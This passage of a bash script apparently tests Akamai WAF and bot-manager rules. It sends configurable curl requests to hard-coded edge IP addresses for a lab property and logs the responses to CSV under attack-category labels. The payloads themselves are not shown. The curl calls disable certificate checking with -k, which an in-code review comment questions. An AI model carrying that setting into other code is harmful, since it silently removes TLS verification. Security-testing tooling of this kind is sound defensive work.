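  CURLARGS="-i -k -s -S -v -m 30 $method $PROTOCOLHOLDER --connect-to ::$1"
  # NOTE(review): -k turns certificate verification off for every request,
  # production included; confirm that this is still required.
  curl_argv=(-i -k -s -S -v -m 30)
  if [[ -n $method ]]; then curl_argv+=(-X "${test_string[2]}"); fi
  if [[ -n $PROTOCOLHOLDER ]]; then curl_argv+=("$PROTOCOLHOLDER"); fi
  curl_argv+=(--connect-to "::$1" "$URL")
  echo -e "${test_string[3]}${test_string[4]}"

  # Header order is the same for both methods; requests with a body add the
  # Content-Type header (H10) just before the three variable headers.
  headers=("$H1" "$H2" "$H3" "$H4" "$H5" "$H6" "$H7" "$H8" "$H9" "$pragma")
  if [[ $send_body -eq 1 ]]; then headers+=("$H10"); fi
  headers+=("$HEADERHOLDER1" "$HEADERHOLDER2" "$HEADERHOLDER3")
  for header in "${headers[@]}"; do
    curl_argv+=(-H "$header")
  done
  if [[ $send_body -eq 1 ]]; then curl_argv+=(--data-raw "$DATAHOLDER"); fi

  if [[ $verbose -eq 1 ]]; then
    shown="> using $CURL $CURLARGS \"$URL\""
    for header in "${headers[@]}"; do
      shown+=" -H \"$header\""
    done
    if [[ $send_body -eq 1 ]]; then shown+=" --data-raw \"$DATAHOLDER\""; fi
    echo -e "$shown"
  fi

  # The transcript goes to a private temporary file instead of a fixed ".temp"
  # in the working directory: a fixed name is shared by concurrent runs and
  # can be pre-created by someone else with write access to that directory.
  resp_file=$(mktemp) || { echo "checker: cannot create temporary file" >&2; exit 1; }
  "$CURL" "${curl_argv[@]}" &> "$resp_file"
  # Marker line; it also guarantees the transcript ends with a newline.
  echo "checker" >> "$resp_file"

  regexhtc='^HTTP\/[0-9]\.[0-9][ ]([[:digit:]]{3})|^curl:.*error: (.*)|^HTTP/2[ ]([[:digit:]]{3})'
  regexref='(#|[[:space:]])([[:digit:]]+\.[a-zA-Z0-9]+\.[a-zA-Z0-9]{10,}\.[a-zA-Z0-9]+)'
  regexdie='.*doctype.*|^(^$)$'
  stopv=0
  http="Timeout"
  refe="Unable to get AK_REFERENCE_ID"
  while IFS= read -r liner; do
    # Undo the HTML entities for '.' and '#' so the reference regex can match.
    liner="${liner//&#46;/.}"
    liner="${liner//&#35;/#}"
    if [[ $liner =~ $regexhtc ]]; then
      # Exactly one of the three groups is set: status code or curl error text.
      http="${BASH_REMATCH[1]}${BASH_REMATCH[2]}${BASH_REMATCH[3]}"
      http=${http%$'\r'}
      http=${http%$' '}
    fi
    if [[ $liner =~ $regexref ]]; then refe="${BASH_REMATCH[2]}"; fi
    # Verbose output stops at the first empty line or doctype line.
    if [[ $verbose -eq 1 ]]; then
      if ! [[ $liner =~ $regexdie || $stopv -eq 1 ]]; then echo "$liner"; else stopv=1; fi
    fi
  done < "$resp_file"
  rm -f -- "$resp_file"

  echo -e "${http}"
  # echo -e "${epoch}"
  # echo -e "${refe}"
  echo -e ""
  if [[ ${filetim} != '' ]]; then exportcsv; fi
}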
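# ---------------------------------------------------------------------------
# Script entry: defaults, option parsing, optional CSV header, then the run.
# ---------------------------------------------------------------------------

# The lab property is the third positional word as the script was invoked,
# taken before option parsing. It becomes part of the request URL and the Host
# header (http://<property>.akamai-lab.com).
property=$3
# Only host-name characters are accepted: a '/', '@', ':' or space in this
# value would change which host the generated test requests are sent to.
property_re='^[A-Za-z0-9._-]*$'
if [[ ! $property =~ $property_re ]]; then
  echo "Oops... invalid property name." >&2
  exit 1
fi

verbose=0
filetim=""; filecnf=""; fileref=""
# Address chosen for the previous request, per pool (see resolve).
PFIPi=""; PEIPi=""; SFIPi=""; SEIPi=""
# Colon-separated edge address pools: P/S = production/staging,
# F/E = the http/https selectors used by resolve.
PFIP="23.54.162.184:23.63.22.131:23.63.22.169:186.177.65.217:186.177.65.208"
PEIP="72.246.84.4:23.40.180.4:23.48.16.4"
SFIP="23.50.49.10:23.50.55.19:23.50.55.25:23.50.51.50:23.50.51.51"
SEIP="23.199.36.2:23.34.4.4:23.59.184.2"
# Names looked up instead of the pools when -d is given.
PFFQ="a1.g.akamai.net"
PEFQ="e1.a.akamaiedge.net"
SFFQ="a1.g.akamai-staging.net"
SEFQ="e1.a.akamaiedge-staging.net"
rules=()
headerorder=()

while getopts "c:r:vedm" option; do
  case $option in
    c)
      filecnf=${OPTARG} ;;
    v)
      verbose=1 ;;
    r)
      fileref=${OPTARG} ;;
    e)
      # The epoch doubles as the "export enabled" flag and the file suffix.
      filetim=$(date +%s) ;;
    d)
      # Empty pools make resolve fall back to DNS lookups.
      PFIP=""
      PEIP=""
      SFIP=""
      SEIP="" ;;
    m)
      helpconf
      exit ;;
  esac
done

# No option at all: show the usage text.
if (( OPTIND == 1 )); then
  help
  exit
fi

# Stop before a report file is created when the plan cannot be read.
if [[ ! -r $filecnf || -d $filecnf ]]; then
  echo "Oops... configuration file not readable: ${filecnf}" >&2
  exit 1
fi

if [[ ${filetim} != '' ]]; then
  export_type=""
  export_payload=""
  # Short codes and their report labels, matched by index in exportcsv.
  ACRONYMA=('man' 'atg' 'bms' 'bmp' 'krs-cmd' 'krs-xss' 'krs-dos' 'krs-iht' 'krs-php' 'krs-rfi' 'krs-sql' 'krs-trj' 'aag-wat' 'aag-wpr' 'aag-sql' 'aag-xss' 'aag-lfi' 'aag-rfi' 'aag-cmi' 'aag-wpl' 'penalty' 'aka-arb' 'aka-asc' 'aka-bib' 'aka-eco' 'aka-eag' 'aka-fia' 'aka-fis' 'aka-job' 'aka-mda' 'aka-new' 'aka-onl' 'aka-rss' 'aka-seo' 'aka-sit' 'aka-soc' 'aka-war' 'aka-wse' 'tra-ikb' 'tra-dvf' 'tra-htl' 'tra-wsl' 'tra-osc' 'tra-hbt' 'tra-dcb' 'tra-agc' 'tra-req' 'act-cok')
  ACRONYMB=('Manual' 'Attack Group' 'Bot Manager Standard' 'Bot Manager Premier' 'Command Injection' 'Cross-Site Scripting' 'DDOS' 'Invalid HTTP' 'PHP Injection' 'Remote File Inclusion' 'SQL Injection' 'Trojan' 'Web Attack Tool' 'Web Protocol Attack' 'SQL Injection' 'Cross-Site Scripting' 'Local File Inclusion' 'Remote File Inclusion' 'Command Injection' 'Web Platform Attack' 'Penalty Box' 'Academic or Research Bots' 'Automated Shopping Cart and Sniper Bots' 'Business Intelligence Bots' 'E-Commerce Search Engine Bots' 'Enterprise Data Aggregator Bots' 'Financial Account Aggregator Bots' 'Financial Services Bots' 'Job Search Engine Bots' 'Media or Entertainment Search Bots' 'News Aggregator Bots' 'Online Advertising Bots' 'RSS Feed Reader Bots' 'SEO Analytics or Marketing Bots' 'Site Monitoring and Web Development Bots' 'Social Media or Blog Bots' 'Web Archiver Bots' 'Web Search Engine Bots' 'Impersonators of Known Bots' 'Development Frameworks' 'HTTP Libraries' 'Web Services Libraries' 'Open Source Crawlers/Scraping Platforms' 'Headless Browsers/Automation Tools' 'Declared Bots (Keyword Match)' 'Aggressive Web Crawlers' 'Request Anomaly' 'Cookie Integrity Failed' 'Cookie Integrity Failed')
  # Quoted so a plan path with spaces still yields a single file name.
  csv_file="$(basename -- "$filecnf")_${filetim}.csv"
  if [[ $verbose -eq 1 ]]; then echo -e "> exporting ${csv_file}"; fi
  echo "Environment,HTTP Code,Checker reference,Akamai reference,Type,Payload,URL" > "$csv_file"
fi

readconfig "$filecnf" "$property"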